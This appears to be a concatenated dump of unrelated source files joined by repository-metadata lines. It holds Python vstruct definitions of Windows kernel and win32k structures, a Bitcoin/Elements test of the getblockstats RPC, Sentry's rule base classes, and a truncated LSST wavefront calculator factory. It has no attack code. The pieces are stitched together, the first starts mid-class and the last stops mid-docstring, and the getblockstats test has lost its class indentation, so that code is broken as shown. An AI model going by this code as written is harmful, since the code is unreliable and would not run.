        self.EtwTraceData = v_ptr32()
        self.WinSockData = v_ptr32()
        self.GdiBatchCount = v_uint32()
        self.CurrentIdealProcessor = PROCESSOR_NUMBER()
        self.GuaranteedStackBytes = v_uint32()
        self.ReservedForPerf = v_ptr32()
        self.ReservedForOle = v_ptr32()
        self.WaitingOnLoaderLock = v_uint32()
        self.SavedPriorityState = v_ptr32()
        self.SoftPatchPtr1 = v_uint32()
        self.ThreadPoolData = v_ptr32()
        self.TlsExpansionSlots = v_ptr32()
        self.MuiGeneration = v_uint32()
        self.IsImpersonating = v_uint32()
        self.NlsCache = v_ptr32()
        self.pShimData = v_ptr32()
        self.HeapVirtualAffinity = v_uint32()
        self.CurrentTransactionHandle = v_ptr32()
        self.ActiveFrame = v_ptr32()
        self.FlsData = v_ptr32()
        self.PreferredLanguages = v_ptr32()
        self.UserPrefLanguages = v_ptr32()
        self.MergedPrefLanguages = v_ptr32()
        self.MuiImpersonation = v_uint32()
        self.CrossTebFlags = v_uint16()
        self.SameTebFlags = v_uint16()
        self.TxnScopeEnterCallback = v_ptr32()
        self.TxnScopeExitCallback = v_ptr32()
        self.TxnScopeContext = v_ptr32()
        self.LockCount = v_uint32()
        self.SpareUlong0 = v_uint32()
        self.ResourceRetValue = v_ptr32()
# --- Auto-generated vstruct definitions (continued); field order is layout. ---
class tagWIN32HEAP(vstruct.VStruct):
    # Opaque in the original headers: no public fields.
    def __init__(self):
        vstruct.VStruct.__init__(self)
class DMM_COMMITVIDPNREQUEST_DIAGINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ClientType = v_uint32()
        self.ReclaimClonedTarget = v_uint8()
        self._pad0008 = v_bytes(size=3)
        self.ModeChangeRequestId = v_uint32()
class IMAGE_DOS_HEADER(vstruct.VStruct):
    # Classic "MZ" DOS header at the start of every PE file;
    # e_lfanew holds the file offset of the IMAGE_NT_HEADERS.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.e_magic = v_uint16()
        self.e_cblp = v_uint16()
        self.e_cp = v_uint16()
        self.e_crlc = v_uint16()
        self.e_cparhdr = v_uint16()
        self.e_minalloc = v_uint16()
        self.e_maxalloc = v_uint16()
        self.e_ss = v_uint16()
        self.e_sp = v_uint16()
        self.e_csum = v_uint16()
        self.e_ip = v_uint16()
        self.e_cs = v_uint16()
        self.e_lfarlc = v_uint16()
        self.e_ovno = v_uint16()
        self.e_res = vstruct.VArray([ v_uint16() for i in xrange(4) ])
        self.e_oemid = v_uint16()
        self.e_oeminfo = v_uint16()
        self.e_res2 = vstruct.VArray([ v_uint16() for i in xrange(10) ])
        self.e_lfanew = v_uint32()
class RTL_DYNAMIC_HASH_TABLE_ENTRY(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Linkage = LIST_ENTRY()
        self.Signature = v_uint32()
class TXN_PARAMETER_BLOCK(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint16()
        self.TxFsContext = v_uint16()
        self.TransactionObject = v_ptr32()
class QUAD(vstruct.VStruct):
    # 8-byte alignment helper type.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.UseThisFieldToCopy = v_uint64()
class _unnamed_12800(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.IoResourceRequirementList = v_ptr32()
class _unnamed_12803(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.WhichSpace = v_uint32()
        self.Buffer = v_ptr32()
        self.Offset = v_uint32()
        self.Length = v_uint32()
class RTL_DYNAMIC_HASH_TABLE(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flags = v_uint32()
        self.Shift = v_uint32()
        self.TableSize = v_uint32()
        self.Pivot = v_uint32()
        self.DivisorMask = v_uint32()
        self.NumEntries = v_uint32()
        self.NonEmptyBuckets = v_uint32()
        self.NumEnumerators = v_uint32()
        self.Directory = v_ptr32()
class _unnamed_12808(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Lock = v_uint8()
class _unnamed_12694(vstruct.VStruct):
    # Read/Write IRP stack-location parameters.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_ptr32()
        self.Key = v_uint32()
        self.ByteOffset = LARGE_INTEGER()
# --- Auto-generated vstruct definition; field order is layout. ---
class tagSERVERINFO(vstruct.VStruct):
    # win32k SERVERINFO: global shared user/GDI state (system metrics, colors,
    # fonts, cursor position, OEM bitmaps, ...). Do not reorder fields.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwSRVIFlags = v_uint32()
        self.cHandleEntries = v_uint32()
        self.mpFnidPfn = vstruct.VArray([ v_ptr32() for i in xrange(32) ])
        self.aStoCidPfn = vstruct.VArray([ v_ptr32() for i in xrange(7) ])
        self.mpFnid_serverCBWndProc = vstruct.VArray([ v_uint16() for i in xrange(31) ])
        self._pad00e4 = v_bytes(size=2)
        self.apfnClientA = PFNCLIENT()
        self.apfnClientW = PFNCLIENT()
        self.apfnClientWorker = PFNCLIENTWORKER()
        self.cbHandleTable = v_uint32()
        self.atomSysClass = vstruct.VArray([ v_uint16() for i in xrange(25) ])
        self._pad0200 = v_bytes(size=2)
        self.dwDefaultHeapBase = v_uint32()
        self.dwDefaultHeapSize = v_uint32()
        self.uiShellMsg = v_uint32()
        self.MBStrings = vstruct.VArray([ tagMBSTRING() for i in xrange(11) ])
        self.atomIconSmProp = v_uint16()
        self.atomIconProp = v_uint16()
        self.atomContextHelpIdProp = v_uint16()
        self.atomFrostedWindowProp = v_uint16()
        self.acOemToAnsi = vstruct.VArray([ v_uint8() for i in xrange(256) ])
        self.acAnsiToOem = vstruct.VArray([ v_uint8() for i in xrange(256) ])
        self.dwInstalledEventHooks = v_uint32()
        self.aiSysMet = vstruct.VArray([ v_uint32() for i in xrange(97) ])
        self.argbSystemUnmatched = vstruct.VArray([ v_uint32() for i in xrange(31) ])
        self.argbSystem = vstruct.VArray([ v_uint32() for i in xrange(31) ])
        self.ahbrSystem = vstruct.VArray([ v_ptr32() for i in xrange(31) ])
        self.hbrGray = v_ptr32()
        self.ptCursor = tagPOINT()
        self.ptCursorReal = tagPOINT()
        self.dwLastRITEventTickCount = v_uint32()
        self.nEvents = v_uint32()
        self.dtScroll = v_uint32()
        self.dtLBSearch = v_uint32()
        self.dtCaretBlink = v_uint32()
        self.ucWheelScrollLines = v_uint32()
        self.ucWheelScrollChars = v_uint32()
        self.wMaxLeftOverlapChars = v_uint32()
        self.wMaxRightOverlapChars = v_uint32()
        self.cxSysFontChar = v_uint32()
        self.cySysFontChar = v_uint32()
        self.tmSysFont = tagTEXTMETRICW()
        self.dpiSystem = tagDPISERVERINFO()
        self.hIconSmWindows = v_ptr32()
        self.hIcoWindows = v_ptr32()
        self.dwKeyCache = v_uint32()
        self.dwAsyncKeyCache = v_uint32()
        self.cCaptures = v_uint32()
        self.oembmi = vstruct.VArray([ tagOEMBITMAPINFO() for i in xrange(93) ])
        self.rcScreenReal = tagRECT()
        self.BitCount = v_uint16()
        self.dmLogPixels = v_uint16()
        self.Planes = v_uint8()
        self.BitsPixel = v_uint8()
        self._pad0f58 = v_bytes(size=2)
        self.PUSIFlags = v_uint32()
        self.uCaretWidth = v_uint32()
        self.UILangID = v_uint16()
        self._pad0f64 = v_bytes(size=2)
        self.dwLastSystemRITEventTickCountUpdate = v_uint32()
        self.adwDBGTAGFlags = vstruct.VArray([ v_uint32() for i in xrange(35) ])
        self.dwTagCount = v_uint32()
        self.dwRIPFlags = v_uint32()
# --- Auto-generated vstruct definitions (continued); field order is layout. ---
class DEVICE_OBJECT(vstruct.VStruct):
    # NT kernel DEVICE_OBJECT: a driver-created device in a device stack.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint16()
        self.Size = v_uint16()
        self.ReferenceCount = v_uint32()
        self.DriverObject = v_ptr32()
        self.NextDevice = v_ptr32()
        self.AttachedDevice = v_ptr32()
        self.CurrentIrp = v_ptr32()
        self.Timer = v_ptr32()
        self.Flags = v_uint32()
        self.Characteristics = v_uint32()
        self.Vpb = v_ptr32()
        self.DeviceExtension = v_ptr32()
        self.DeviceType = v_uint32()
        self.StackSize = v_uint8()
        self._pad0034 = v_bytes(size=3)
        self.Queue = _unnamed_12451()
        self.AlignmentRequirement = v_uint32()
        self.DeviceQueue = KDEVICE_QUEUE()
        self.Dpc = KDPC()
        self.ActiveThreadCount = v_uint32()
        self.SecurityDescriptor = v_ptr32()
        self.DeviceLock = KEVENT()
        self.SectorSize = v_uint16()
        self.Spare1 = v_uint16()
        self.DeviceObjectExtension = v_ptr32()
        self.Reserved = v_ptr32()
class _unnamed_12699(vstruct.VStruct):
    # DeviceIoControl IRP stack-location parameters.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.OutputBufferLength = v_uint32()
        self.InputBufferLength = v_uint32()
        self.IoControlCode = v_uint32()
        self.Type3InputBuffer = v_ptr32()
class _unnamed_12510(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DeviceQueueEntry = KDEVICE_QUEUE_ENTRY()
        self.Thread = v_ptr32()
        self.AuxiliaryBuffer = v_ptr32()
        self.ListEntry = LIST_ENTRY()
        self.CurrentStackLocation = v_ptr32()
        self.OriginalFileObject = v_ptr32()
class _unnamed_16591(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MinimumVector = v_uint32()
        self.MaximumVector = v_uint32()
        self.AffinityPolicy = v_uint16()
        self.Group = v_uint16()
        self.PriorityPolicy = v_uint32()
        self.TargetedProcessors = v_uint32()
class _unnamed_16598(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MinimumChannel = v_uint32()
        self.MaximumChannel = v_uint32()
class tagCLIENTINFO(vstruct.VStruct):
    # Per-thread user32 client-side info block.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.CI_flags = v_uint32()
        self.cSpins = v_uint32()
        self.dwExpWinVer = v_uint32()
        self.dwCompatFlags = v_uint32()
        self.dwCompatFlags2 = v_uint32()
        self.dwTIFlags = v_uint32()
        self.pDeskInfo = v_ptr32()
        self.ulClientDelta = v_uint32()
        self.phkCurrent = v_ptr32()
        self.fsHooks = v_uint32()
        self.CallbackWnd = CALLBACKWND()
        self.dwHookCurrent = v_uint32()
        self.cInDDEMLCallback = v_uint32()
        self.pClientThreadInfo = v_ptr32()
        self.dwHookData = v_uint32()
        self.dwKeyCache = v_uint32()
        self.afKeyState = vstruct.VArray([ v_uint8() for i in xrange(8) ])
        self.dwAsyncKeyCache = v_uint32()
        self.afAsyncKeyState = vstruct.VArray([ v_uint8() for i in xrange(8) ])
        self.afAsyncKeyStateRecentDown = vstruct.VArray([ v_uint8() for i in xrange(8) ])
        self.hKL = v_ptr32()
        self.CodePage = v_uint16()
        self.achDbcsCF = vstruct.VArray([ v_uint8() for i in xrange(2) ])
        self.msgDbcsCB = tagMSG()
        self.lpdwRegisteredClasses = v_ptr32()
class HWINSTA(vstruct.VStruct):
    # Opaque window-station handle placeholder.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class TL(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.next = v_ptr32()
        self.pobj = v_ptr32()
        self.pfnFree = v_ptr32()
class IMAGE_NT_HEADERS(vstruct.VStruct):
    # PE "NT" headers: PE\0\0 signature + COFF file header + optional header.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Signature = v_uint32()
        self.FileHeader = IMAGE_FILE_HEADER()
        self.OptionalHeader = IMAGE_OPTIONAL_HEADER()
class IO_STACK_LOCATION(vstruct.VStruct):
    # One per-driver stack location inside an IRP.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MajorFunction = v_uint8()
        self.MinorFunction = v_uint8()
        self.Flags = v_uint8()
        self.Control = v_uint8()
        self.Parameters = _unnamed_12471()
        self.DeviceObject = v_ptr32()
        self.FileObject = v_ptr32()
        self.CompletionRoutine = v_ptr32()
        self.Context = v_ptr32()
# --- Auto-generated vstruct definitions (continued); field order is layout. ---
class tagTERMINAL(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwTERMF_Flags = v_uint32()
        self.spwndDesktopOwner = v_ptr32()
        self.ptiDesktop = v_ptr32()
        self.pqDesktop = v_ptr32()
        self.dwNestedLevel = v_uint32()
        self.pEventTermInit = v_ptr32()
        self.rpdeskDestroy = v_ptr32()
        self.pEventInputReady = v_ptr32()
class D3DKMDT_VIDPN_PRESENT_PATH(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.VidPnSourceId = v_uint32()
        self.VidPnTargetId = v_uint32()
        self.ImportanceOrdinal = v_uint32()
        self.ContentTransformation = D3DKMDT_VIDPN_PRESENT_PATH_TRANSFORMATION()
        self.VisibleFromActiveTLOffset = D3DKMDT_2DREGION()
        self.VisibleFromActiveBROffset = D3DKMDT_2DREGION()
        self.VidPnTargetColorBasis = v_uint32()
        self.VidPnTargetColorCoeffDynamicRanges = D3DKMDT_COLOR_COEFF_DYNAMIC_RANGES()
        self.Content = v_uint32()
        self.CopyProtection = D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION()
        self.GammaRamp = D3DKMDT_GAMMA_RAMP()
class tagMENULIST(vstruct.VStruct):
    # Singly-linked list node of menu pointers.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pNext = v_ptr32()
        self.pMenu = v_ptr32()
class VK_VALUES_STRINGS(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pszMultiNames = v_ptr32()
        self.fReserved = v_uint8()
        self._pad0008 = v_bytes(size=3)
class tagKL(vstruct.VStruct):
    # win32k keyboard-layout object (doubly linked via pklNext/pklPrev).
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = HEAD()
        self.pklNext = v_ptr32()
        self.pklPrev = v_ptr32()
        self.dwKL_Flags = v_uint32()
        self.hkl = v_ptr32()
        self.spkf = v_ptr32()
        self.spkfPrimary = v_ptr32()
        self.dwFontSigs = v_uint32()
        self.iBaseCharset = v_uint32()
        self.CodePage = v_uint16()
        self.wchDiacritic = v_uint16()
        self.piiex = v_ptr32()
        self.uNumTbl = v_uint32()
        self.pspkfExtra = v_ptr32()
        self.dwLastKbdType = v_uint32()
        self.dwLastKbdSubType = v_uint32()
        self.dwKLID = v_uint32()
class tagPOINT(vstruct.VStruct):
    # 2D point (POINT).
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.x = v_uint32()
        self.y = v_uint32()
class RTL_USER_PROCESS_PARAMETERS(vstruct.VStruct):
    # Process startup parameters pointed to by PEB.ProcessParameters.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MaximumLength = v_uint32()
        self.Length = v_uint32()
        self.Flags = v_uint32()
        self.DebugFlags = v_uint32()
        self.ConsoleHandle = v_ptr32()
        self.ConsoleFlags = v_uint32()
        self.StandardInput = v_ptr32()
        self.StandardOutput = v_ptr32()
        self.StandardError = v_ptr32()
        self.CurrentDirectory = CURDIR()
        self.DllPath = UNICODE_STRING()
        self.ImagePathName = UNICODE_STRING()
        self.CommandLine = UNICODE_STRING()
        self.Environment = v_ptr32()
        self.StartingX = v_uint32()
        self.StartingY = v_uint32()
        self.CountX = v_uint32()
        self.CountY = v_uint32()
        self.CountCharsX = v_uint32()
        self.CountCharsY = v_uint32()
        self.FillAttribute = v_uint32()
        self.WindowFlags = v_uint32()
        self.ShowWindowFlags = v_uint32()
        self.WindowTitle = UNICODE_STRING()
        self.DesktopInfo = UNICODE_STRING()
        self.ShellInfo = UNICODE_STRING()
        self.RuntimeData = UNICODE_STRING()
        # Field name ("Directores") is misspelled in the native headers too;
        # keep it so offsets/names match the reference structure.
        self.CurrentDirectores = vstruct.VArray([ RTL_DRIVE_LETTER_CURDIR() for i in xrange(32) ])
        self.EnvironmentSize = v_uint32()
        self.EnvironmentVersion = v_uint32()
class _unnamed_16077(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Raw = _unnamed_16072()
class tagSHAREDINFO(vstruct.VStruct):
    # user32/win32k shared-section info block.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.psi = v_ptr32()
        self.aheList = v_ptr32()
        self.HeEntrySize = v_uint32()
        self.pDispInfo = v_ptr32()
        self.ulSharedDelta = v_uint32()
        self.awmControl = vstruct.VArray([ WNDMSG() for i in xrange(31) ])
        self.DefWindowMsgs = WNDMSG()
        self.DefWindowSpecMsgs = WNDMSG()
class tagIMC(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = THRDESKHEAD()
        self.pImcNext = v_ptr32()
        self.dwClientImcData = v_uint32()
        self.hImeWnd = v_ptr32()
class IO_RESOURCE_REQUIREMENTS_LIST(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ListSize = v_uint32()
        self.InterfaceType = v_uint32()
        self.BusNumber = v_uint32()
        self.SlotNumber = v_uint32()
        self.Reserved = vstruct.VArray([ v_uint32() for i in xrange(3) ])
        self.AlternativeLists = v_uint32()
        # Variable-length in the native struct; serialized here with 1 element.
        self.List = vstruct.VArray([ IO_RESOURCE_LIST() for i in xrange(1) ])
class tagCARET(vstruct.VStruct):
    # win32k caret (text cursor) state.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.spwnd = v_ptr32()
        self.fVisible = v_uint32()
        self.iHideLevel = v_uint32()
        self.x = v_uint32()
        self.y = v_uint32()
        self.cy = v_uint32()
        self.cx = v_uint32()
        self.hBitmap = v_ptr32()
        self.hTimer = v_uint32()
        self.tid = v_uint32()
        self.xOwnDc = v_uint32()
        self.yOwnDc = v_uint32()
        self.cxOwnDc = v_uint32()
        self.cyOwnDc = v_uint32()
|
tdudz/elements
|
refs/heads/elements-0.14.1
|
qa/rpc-tests/rpc_getblockstats.py
|
1
|
#!/usr/bin/env python3
# Copyright (c) 2017-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test getblockstats rpc call
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_jsonrpc,
connect_nodes_bi,
start_nodes,
)
import logging
import json
import os
import time
# Absolute directory containing this test script; used to resolve --test-data.
TESTSDIR = os.path.dirname(os.path.realpath(__file__))
class GetblockstatsTest(BitcoinTestFramework):
    """Functional test for the getblockstats RPC call.

    Compares getblockstats output against reference data stored in a JSON
    file (regenerable with --gen-test-data).
    """
    # Height of the first block whose stats are checked (just past the
    # initial 101 generated blocks).
    start_height = 101
    # Number of additional block positions checked after start_height.
    max_stat_pos = 2
    # Statistics that are only available on a node running with -txindex.
    STATS_NEED_TXINDEX = [
        'utxo_size_inc',
    ]
def add_options(self, parser):
parser.add_option('--gen-test-data', dest='gen_test_data',
default=False, action='store_true',
help='Generate test data')
parser.add_option('--test-data', dest='test_data',
default='data/rpc_getblockstats.json',
action='store', metavar='FILE',
help='Test data file')
def __init__(self):
super().__init__()
self.num_nodes = 2
self.extra_args = [['-txindex'], ['-paytxfee=0.003']]
self.setup_clean_chain = True
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, extra_args=self.extra_args)
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split=False
self.sync_all()
def get_stats(self):
return [self.nodes[0].getblockstats(hash_or_height=self.start_height + i) for i in range(self.max_stat_pos+1)]
    def generate_test_data(self, filename):
        """Build a small chain with varied transactions and dump the raw
        blocks, the recorded mocktime and the expected getblockstats output
        to *filename* as JSON (consumed later by load_test_data)."""
        # Record wall-clock time so replays can pin the nodes' clocks to it.
        mocktime = time.time()

        # Mature coinbase outputs so node 0 has spendable funds.
        self.nodes[0].generate(101)

        self.nodes[0].sendtoaddress(address=self.nodes[1].getnewaddress(), amount=10, subtractfeefromamount=True)
        self.nodes[0].generate(1)
        self.sync_all()

        # A mix of self-sends with/without fee subtraction plus a cross-node
        # payment, so the stats cover different fee/amount patterns.
        self.nodes[0].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=10, subtractfeefromamount=True)
        self.nodes[0].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=10, subtractfeefromamount=False)
        self.nodes[1].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=1, subtractfeefromamount=True)
        self.sync_all()
        self.nodes[0].generate(1)

        self.expected_stats = self.get_stats()

        # Serialize every block from genesis up to and including the tip.
        blocks = []
        tip = self.nodes[0].getbestblockhash()
        blockhash = None
        height = 0
        while tip != blockhash:
            blockhash = self.nodes[0].getblockhash(height)
            blocks.append(self.nodes[0].getblock(blockhash, 0))
            height += 1

        to_dump = {
            'blocks': blocks,
            'mocktime': int(mocktime),
            'stats': self.expected_stats,
        }
        with open(filename, 'w') as f:
            json.dump(to_dump, f, sort_keys=True, indent=2)
def load_test_data(self, filename):
with open(filename, 'r') as f:
d = json.load(f)
blocks = d['blocks']
mocktime = d['mocktime']
self.expected_stats = d['stats']
# Set the timestamps from the file so that the nodes can get out of Initial Block Download
self.nodes[0].setmocktime(mocktime)
self.nodes[1].setmocktime(mocktime)
for b in blocks:
self.nodes[0].submitblock(b)
def run_test(self):
    """Validate getblockstats against pre-computed expected values: by
    height and by hash, per-stat and multi-stat selection, with and
    without -txindex, plus the error paths for bad heights, unknown
    statistics and unknown block hashes.
    """
    test_data = os.path.join(TESTSDIR, self.options.test_data)
    if self.options.gen_test_data:
        self.generate_test_data(test_data)
    else:
        self.load_test_data(test_data)
    self.sync_all()
    stats = self.get_stats()
    # Subset of stats that node1 (started without -txindex) can still serve.
    expected_stats_noindex = []
    for stat_row in stats:
        expected_stats_noindex.append({k: v for k, v in stat_row.items() if k not in self.STATS_NEED_TXINDEX})
    # Make sure all valid statistics are included but nothing else is
    expected_keys = self.expected_stats[0].keys()
    assert_equal(set(stats[0].keys()), set(expected_keys))
    assert_equal(stats[0]['height'], self.start_height)
    assert_equal(stats[self.max_stat_pos]['height'], self.start_height + self.max_stat_pos)
    for i in range(self.max_stat_pos+1):
        logging.info('Checking block %d\n' % (i))
        assert_equal(stats[i], self.expected_stats[i])
        # Check selecting block by hash too
        blockhash = self.expected_stats[i]['blockhash']
        stats_by_hash = self.nodes[0].getblockstats(hash_or_height=blockhash)
        assert_equal(stats_by_hash, self.expected_stats[i])
        # Check with the node that has no txindex
        stats_no_txindex = self.nodes[1].getblockstats(hash_or_height=blockhash, stats=list(expected_stats_noindex[i].keys()))
        assert_equal(stats_no_txindex, expected_stats_noindex[i])
    # Make sure each stat can be queried on its own
    for stat in expected_keys:
        for i in range(self.max_stat_pos+1):
            result = self.nodes[0].getblockstats(hash_or_height=self.start_height + i, stats=[stat])
            assert_equal(list(result.keys()), [stat])
            # Log the mismatch before the assertion so failures show context.
            if result[stat] != self.expected_stats[i][stat]:
                logging.info('result[%s] (%d) failed, %r != %r' % (
                    stat, i, result[stat], self.expected_stats[i][stat]))
            assert_equal(result[stat], self.expected_stats[i][stat])
    # Make sure only the selected statistics are included (more than one)
    some_stats = {'minfee', 'maxfee'}
    stats = self.nodes[0].getblockstats(hash_or_height=1, stats=list(some_stats))
    assert_equal(set(stats.keys()), some_stats)
    # Test invalid parameters raise the proper json exceptions
    tip = self.start_height + self.max_stat_pos
    assert_raises_jsonrpc(-8, 'Target block height %d after current tip %d' % (tip+1, tip),
                          self.nodes[0].getblockstats, hash_or_height=tip+1)
    assert_raises_jsonrpc(-8, 'Target block height %d is negative' % (-1),
                          self.nodes[0].getblockstats, hash_or_height=-1)
    # Make sure not valid stats aren't allowed
    inv_sel_stat = 'asdfghjkl'
    inv_stats = [
        [inv_sel_stat],
        ['minfee' , inv_sel_stat],
        [inv_sel_stat, 'minfee'],
        ['minfee', inv_sel_stat, 'maxfee'],
    ]
    for inv_stat in inv_stats:
        assert_raises_jsonrpc(-8, 'Invalid selected statistic %s' % inv_sel_stat,
                              self.nodes[0].getblockstats, hash_or_height=1, stats=inv_stat)
    # Make sure we aren't always returning inv_sel_stat as the culprit stat
    assert_raises_jsonrpc(-8, 'Invalid selected statistic aaa%s' % inv_sel_stat,
                          self.nodes[0].getblockstats, hash_or_height=1, stats=['minfee' , 'aaa%s' % inv_sel_stat])
    assert_raises_jsonrpc(-8, 'One or more of the selected stats requires -txindex enabled',
                          self.nodes[1].getblockstats, hash_or_height=self.start_height + self.max_stat_pos)
    # Mainchain's genesis block shouldn't be found on regtest
    assert_raises_jsonrpc(-5, 'Block not found', self.nodes[0].getblockstats,
                          hash_or_height='000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f')
# Script entry point: the framework's main() handles option parsing, node
# setup/teardown and reporting.
if __name__ == '__main__':
    GetblockstatsTest().main()
|
fotinakis/sentry
|
refs/heads/master
|
src/sentry/rules/base.py
|
6
|
"""
sentry.rules.base
~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
Rules apply either before an event gets stored, or immediately after.
Basic actions:
- I want to get notified when [X]
- I want to group events when [X]
- I want to scrub data when [X]
Expanded:
- I want to get notified when an event is first seen
- I want to get notified when an event is marked as a regression
- I want to get notified when the rate of an event increases by [100%]
- I want to get notified when an event has been seen more than [100] times
- I want to get notified when an event matches [conditions]
- I want to group events when an event matches [conditions]
Rules get broken down into two phases:
- An action
- A rule condition
A condition itself may actually be any number of things, but that is determined
by the rule's logic. Each rule condition may be associated with a form.
- [ACTION:I want to get notified when] [RULE:an event is first seen]
- [ACTION:I want to group events when] [RULE:an event matches [FORM]]
"""
from __future__ import absolute_import
import logging
import re
import six
from collections import namedtuple
from django.utils.safestring import mark_safe
from sentry.utils.html import escape
# Deferred rule action: a callback plus the keyword arguments to invoke it
# with later (built via RuleBase.future()).
CallbackFuture = namedtuple('CallbackFuture', ['callback', 'kwargs'])
class RuleDescriptor(type):
    """Metaclass that stamps every rule class with a unique ``id``.

    The id is the dotted module path plus the class name, e.g.
    ``sentry.rules.base.RuleBase``.
    """
    def __new__(cls, *args, **kwargs):
        rule_cls = super(RuleDescriptor, cls).__new__(cls, *args, **kwargs)
        rule_cls.id = '{0}.{1}'.format(rule_cls.__module__, rule_cls.__name__)
        return rule_cls
@six.add_metaclass(RuleDescriptor)
class RuleBase(object):
    """Common behaviour shared by rule conditions and actions.

    Subclasses provide a human-readable ``label`` (optionally containing
    ``{field}`` placeholders) and, when configurable, a ``form_cls`` used
    to validate and render the rule's options.
    """
    label = None
    form_cls = None

    logger = logging.getLogger('sentry.rules')

    def __init__(self, project, data=None, rule=None):
        self.project = project
        self.data = data or {}
        # Track whether explicit data was supplied so forms can distinguish
        # "unbound" from "bound with empty data".
        self.had_data = data is not None
        self.rule = rule

    def get_option(self, key):
        # Missing keys resolve to None rather than raising.
        return self.data.get(key)

    def get_form_instance(self):
        # Only bind the form when the rule was constructed with data.
        bound_data = self.data if self.had_data else None
        return self.form_cls(bound_data)

    def render_label(self):
        # Interpolate stored option values into the label template.
        return self.label.format(**self.data)

    def render_form(self):
        if not self.form_cls:
            return self.label

        form = self.get_form_instance()

        def replace_field(match):
            # Swap each {field} placeholder for the rendered form widget.
            return six.text_type(form[match.group(1)])

        return mark_safe(re.sub(r'{([^}]+)}', replace_field, escape(self.label)))

    def validate_form(self):
        if not self.form_cls:
            return True
        return self.get_form_instance().is_valid()

    def future(self, callback, **kwargs):
        # Package a deferred invocation for later execution.
        return CallbackFuture(callback=callback, kwargs=kwargs)
class EventState(object):
    """Snapshot of per-event flags consulted while evaluating rules.

    ``is_new``: first time the event has been seen.
    ``is_regression``: the event reappeared after being resolved.
    ``is_sample``: the event was kept by sampling.
    """
    def __init__(self, is_new, is_regression, is_sample):
        self.is_new = is_new
        self.is_regression = is_regression
        # BUG FIX: a stray trailing comma previously made this attribute a
        # 1-tuple (e.g. ``(False,)``), which is always truthy and therefore
        # defeated any ``if state.is_sample`` check.
        self.is_sample = is_sample
|
lsst-ts/ts_wep
|
refs/heads/master
|
python/lsst/ts/wep/ctrlIntf/WEPCalculationFactory.py
|
1
|
# This file is part of ts_wep.
#
# Developed for the LSST Telescope and Site Systems.
# This product includes software developed by the LSST Project
# (https://www.lsst.org).
# See the COPYRIGHT file at the top-level directory of this distribution
# for details of code ownership.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
from lsst.ts.wep.Utility import CamType
from lsst.ts.wep.ctrlIntf.WEPCalculationOfLsstCam import WEPCalculationOfLsstCam
from lsst.ts.wep.ctrlIntf.WEPCalculationOfLsstFamCam import WEPCalculationOfLsstFamCam
from lsst.ts.wep.ctrlIntf.WEPCalculationOfComCam import WEPCalculationOfComCam
class WEPCalculationFactory(object):
    """Factory for creating the correct WEP calculation based off the camera
    type currently being used."""

    def __init__(self):
        """Construct a WEP calculation factory object."""
        super().__init__()

    @staticmethod
    def getCalculator(camType, isrDir):
        """Get a calculator to process wavefront image.

        Parameters
        ----------
        camType : enum 'CamType'
            The camera type to get the wavefront calculator for.
        isrDir : str
            Instrument signature removal (ISR) directory. This directory
            will have the input and output that the data butler needs.

        Returns
        -------
        WEPCalculationOfLsstCam, WEPCalculationOfLsstFamCam, or
